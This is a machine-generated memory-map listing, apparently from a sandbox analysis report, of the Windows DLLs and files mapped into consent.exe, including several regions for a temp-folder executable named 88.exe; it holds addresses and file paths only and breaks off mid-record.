name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4476 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4477 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4478 start_va = 0xfff30000 end_va = 0xfff4dfff monitored = 0 entry_point = 0xfff3a1d0 region_type = mapped_file name = "consent.exe" filename = "\\Windows\\System32\\consent.exe" (normalized: "c:\\windows\\system32\\consent.exe") Region: id = 4479 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4480 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4481 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 4482 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 4483 start_va = 0x200000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4484 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4485 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4486 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4487 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4488 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4489 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4490 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4491 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4492 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4493 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4494 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4495 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4496 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4497 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4498 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4499 start_va = 0x7fef84c0000 end_va = 0x7fef84c6fff monitored = 0 entry_point = 0x7fef84c1010 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 4500 start_va = 0x7fefd520000 end_va = 0x7fefd527fff monitored = 0 entry_point = 0x7fefd522a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 4501 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4502 start_va = 0x7fef8660000 end_va = 0x7fef869afff monitored = 0 entry_point = 0x7fef86622f0 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 4503 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4504 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4505 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4506 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4507 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4508 start_va = 0x7fef81c0000 end_va = 0x7fef81cafff monitored = 0 entry_point = 0x7fef81c1290 region_type = mapped_file name = "msctfmonitor.dll" filename = "\\Windows\\System32\\MsCtfMonitor.dll" (normalized: "c:\\windows\\system32\\msctfmonitor.dll") Region: id = 4509 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4510 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4511 start_va = 0x7fef8180000 end_va = 0x7fef81bcfff monitored = 0 entry_point = 0x7fef8181bdc region_type = mapped_file name = "msutb.dll" filename = "\\Windows\\System32\\msutb.dll" (normalized: "c:\\windows\\system32\\msutb.dll") Region: id = 4512 start_va = 0x7fefc250000 end_va = 0x7fefc443fff monitored = 0 entry_point = 0x7fefc3dc924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 4513 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4514 start_va = 0x300000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 4515 start_va = 0x300000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 4516 start_va = 0x420000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 4517 start_va = 0x430000 end_va = 0x5b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 4518 start_va = 0x5c0000 end_va = 0x740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4519 start_va = 0x750000 end_va = 0x1b4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4520 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "consent.exe.mui" filename = "\\Windows\\System32\\en-US\\consent.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\consent.exe.mui") Region: id = 4521 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 4522 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 4523 start_va = 0xe0000 end_va = 0xe0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 4524 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 4525 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 4526 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4527 start_va = 0x1c50000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 4528 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 4529 start_va = 0x7fefdee0000 end_va = 0x7fefec67fff monitored = 0 entry_point = 0x7fefdf5cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4530 start_va = 0x100000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 4531 start_va = 0x1b50000 end_va = 0x1bccfff monitored = 0 entry_point = 0x1b5cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4532 start_va = 0x1b50000 end_va = 0x1bccfff monitored = 0 entry_point = 0x1b5cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4533 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4534 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4535 start_va = 0x1cd0000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 4536 start_va = 0x1b50000 end_va = 0x1c2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 4537 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 4538 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4539 start_va = 0x1cd0000 end_va = 0x1d14fff monitored = 0 entry_point = 0x1cd1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4540 start_va = 0x1db0000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 4541 start_va = 0x1cd0000 end_va = 0x1d14fff monitored = 0 entry_point = 0x1cd1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4542 start_va = 0x1cd0000 end_va = 0x1d14fff monitored = 0 entry_point = 0x1cd1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4543 start_va = 0x1cd0000 end_va = 0x1d14fff monitored = 0 entry_point = 0x1cd1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4544 start_va = 0x1cd0000 end_va = 0x1d14fff monitored = 0 entry_point = 0x1cd1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4545 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4546 start_va = 0x1f00000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 4547 start_va = 0x1f80000 end_va = 0x2167fff monitored = 1 entry_point = 0x1f831a3 region_type = mapped_file name = "88.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\88.exe") Region: id = 4548 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 4549 start_va = 0x1f80000 end_va = 0x224efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4550 start_va = 0x2360000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4551 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 4552 start_va = 0x7feff160000 end_va = 0x7feff176fff monitored = 0 entry_point = 0x7feff161070 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 4553 start_va = 0x1cd0000 end_va = 0x1d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 4554 start_va = 0x23e0000 end_va = 0x25c7fff monitored = 1 entry_point = 0x23e31a3 region_type = mapped_file name = "88.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\88.exe") Region: id = 4555 start_va = 0x23e0000 end_va = 0x25c7fff monitored = 1 entry_point = 0x23e31a3 region_type = mapped_file name = "88.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\88.exe") Region: id = 4556 start_va = 0xe0000 end_va = 0xe9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 4557 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4558 start_va = 0x7fefcc80000 end_va = 0x7fefcccbfff monitored = 0 entry_point = 0x7fefcc87950 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4559 start_va = 0x23e0000 end_va = 0x25c7fff monitored = 1 entry_point = 0x23e31a3 region_type = mapped_file name = "88.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\88.exe") Region: id = 4560 start_va = 0x23e0000 end_va = 0x25c7fff monitored = 1 entry_point = 0x23e31a3 region_type = mapped_file name = "88.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\88.exe") Region: id = 4561 start_va = 0x23e0000 end_va = 0x25c7fff monitored = 1 entry_point = 0x23e31a3 region_type = mapped_file name = "88.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\88.exe") Region: id = 4562 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4563 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 4564 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4565 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4566 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 4567 start_va = 0x7fefdb20000 end_va = 0x7fefdc97fff monitored = 0 entry_point = 0x7fefdb210e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 4568 start_va = 0x7fefee00000 end_va = 0x7fefef29fff monitored = 0 entry_point = 0x7fefee010d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 4569 start_va = 0x7feff860000 end_va = 0x7feffab8fff monitored = 0 entry_point = 0x7feff861340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4570 start_va = 0x2420000 end_va = 0x249ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 4571 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4572 start_va = 0x2500000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 4573 start_va = 0x69910000 end_va = 0x6ac65fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 4574 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4575 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 4576 start_va = 0x2580000 end_va = 0x38d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 4577 start_va = 0x2580000 end_va = 0x38d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 4578 start_va = 0x7fefbc40000 end_va = 0x7fefbc57fff monitored = 0 entry_point = 0x7fefbc41130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 4579 start_va = 0x2580000 end_va = 0x278ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 4580 start_va = 0x2790000 end_va = 0x30bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 4591 start_va = 0x2560000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 4592 start_va = 0x2250000 end_va = 0x234ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 4593 start_va = 0x30f0000 end_va = 0x316ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 4594 start_va = 0x7fef98d0000 end_va = 0x7fef9903fff monitored = 0 entry_point = 0x7fef98d11e0 region_type = mapped_file name = "credui.dll" filename = "\\Windows\\System32\\credui.dll" (normalized: "c:\\windows\\system32\\credui.dll") Region: id = 4595 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 4596 start_va = 0x1d0000 end_va = 0x1d2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 4597 start_va = 0x7fefc560000 end_va = 0x7fefc739fff monitored = 0 entry_point = 0x7fefc563130 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 4598 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4599 start_va = 0x7fefc450000 end_va = 0x7fefc559fff monitored = 0 entry_point = 0x7fefc451010 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 4600 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 4601 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4602 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 4603 start_va = 0x1e50000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 4604 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 4605 start_va = 0x7fefbe50000 end_va = 0x7fefc064fff monitored = 0 entry_point = 0x7fefc0264b0 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 4606 start_va = 0x24a0000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 4607 start_va = 0x7fefbd50000 end_va = 0x7fefbe41fff monitored = 0 entry_point = 0x7fefbd7ac20 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 4608 start_va = 0x1c30000 end_va = 0x1c31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c30000" filename = "" Region: id = 4609 start_va = 0x23e0000 end_va = 0x241ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 4610 start_va = 0x7fefbd00000 end_va = 0x7fefbd42fff monitored = 0 entry_point = 0x7fefbd0c168 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 4611 start_va = 0x3190000 end_va = 0x320ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 4612 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 4613 start_va = 0x1c40000 end_va = 0x1c46fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "authui.dll.mui" filename = "\\Windows\\System32\\en-US\\authui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\authui.dll.mui") Region: id = 4614 start_va = 0x7fefbc00000 end_va = 0x7fefbc34fff monitored = 0 entry_point = 0x7fefbc01064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 4615 start_va = 0x6ac70000 end_va = 0x6bfc5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 4616 start_va = 0x1cd0000 end_va = 0x1cd0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 4617 start_va = 0x1d00000 end_va = 0x1d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 4618 start_va = 0x1ce0000 end_va = 0x1ce0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 4619 start_va = 0x1cf0000 end_va = 0x1cf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 4620 start_va = 0x1d80000 end_va = 0x1d80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 4621 start_va = 0x1d90000 end_va = 0x1d90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 4622 start_va = 0x1da0000 